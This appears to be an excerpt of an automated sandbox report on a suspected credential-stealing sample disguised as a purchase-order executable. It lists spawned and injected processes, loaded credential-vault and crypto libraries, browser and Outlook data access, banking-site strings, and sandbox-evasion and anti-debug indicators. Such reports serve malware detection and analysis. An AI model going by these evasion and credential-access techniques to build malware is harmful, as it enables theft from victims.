            Source: netbtugc.exe, 00000004.00000002.4617655793.000000000053F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2487878088.0000000000560000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.000000000056C000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.0000000000590000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.0000000000560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO-DOC1522025-12.exeVirustotal: Detection: 30%
            Source: PO-DOC1522025-12.exeReversingLabs: Detection: 42%
            Source: unknownProcess created: C:\Users\user\Desktop\PO-DOC1522025-12.exe "C:\Users\user\Desktop\PO-DOC1522025-12.exe"
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-DOC1522025-12.exe"
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-DOC1522025-12.exe"Jump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO-DOC1522025-12.exeStatic file information: File size 1645568 > 1048576
            Source: PO-DOC1522025-12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PO-DOC1522025-12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PO-DOC1522025-12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PO-DOC1522025-12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PO-DOC1522025-12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PO-DOC1522025-12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PO-DOC1522025-12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4618964468.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2376979999.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-DOC1522025-12.exe, 00000000.00000003.2158675460.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, PO-DOC1522025-12.exe, 00000000.00000003.2148299636.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204520279.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2206583062.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2302825113.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000C3E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2300126241.0000000000740000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-DOC1522025-12.exe, 00000000.00000003.2158675460.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, PO-DOC1522025-12.exe, 00000000.00000003.2148299636.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2300439322.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204520279.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300439322.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2206583062.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4622084079.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2302825113.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4622084079.0000000000C3E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2300126241.0000000000740000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2269062053.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300088852.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000003.2239214406.0000000000D55000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4623285061.000000000329C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2377197229.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2594702561.000000003778C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4623285061.000000000329C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000000.2377197229.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2594702561.000000003778C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2269062053.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2300088852.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000003.2239214406.0000000000D55000.00000004.00000020.00020000.00000000.sdmp
            Source: PO-DOC1522025-12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PO-DOC1522025-12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PO-DOC1522025-12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PO-DOC1522025-12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PO-DOC1522025-12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001442DE
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00160A76 push ecx; ret 0_2_00160A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340225F pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034027FA pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340283D push eax; iretd 2_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340135E push eax; iretd 2_2_03401369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AA225F pushad ; ret 4_2_00AA27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AA27FA pushad ; ret 4_2_00AA27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AA283D push eax; iretd 4_2_00AA2858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AD09AD push ecx; mov dword ptr [esp], ecx4_2_00AD09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AA1368 push eax; iretd 4_2_00AA1369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D2238 pushad ; iretd 4_2_001D2239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001DAB37 push 00000038h; iretd 4_2_001DAB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D6CB3 push ebx; iretd 4_2_001D6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D6E56 push ebx; iretd 4_2_001D6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D0EAB push ebp; retf 4_2_001D0EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D101F push es; iretd 4_2_001D1027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001C1126 push esp; ret 4_2_001C1127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001DD1B0 push es; ret 4_2_001DD1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D550F pushad ; retf 4_2_001D5510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001DFEF5 push FFFFFFBAh; ret 4_2_001DFEF7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001CFFA0 push esi; iretd 4_2_001CFFA5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0099429A push cs; retf 4_2_009942F6
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0015F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0015F98E
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_001D1C41
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98475
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeAPI/Special instruction interceptor: Address: F4DB74
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6816Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3156Jump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4176Thread sleep count: 6816 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4176Thread sleep time: -13632000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4176Thread sleep count: 3156 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4176Thread sleep time: -6312000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe TID: 3380Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe TID: 3380Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe TID: 3380Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0017C2A2 FindFirstFileExW,0_2_0017C2A2
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B68EE FindFirstFileW,FindClose,0_2_001B68EE
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_001B698F
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001AD076
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001AD3A9
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001B9642
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001B979D
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_001B9B2B
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_001ADBBE
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_001B5C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001DBAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_001DBAB0
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001442DE
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696487552f
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: netbtugc.exe, 00000004.00000002.4625606188.00000000077A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552t
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4621013692.0000000000960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: netbtugc.exe, 00000004.00000002.4625606188.00000000077A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: netbtugc.exe, 00000004.00000002.4625606188.00000000077A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: netbtugc.exe, 00000004.00000002.4625606188.00000000077A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169648
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: firefox.exe, 0000000A.00000002.2596344085.000001A9F76ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001BEAA2 BlockInput,0_2_001BEAA2
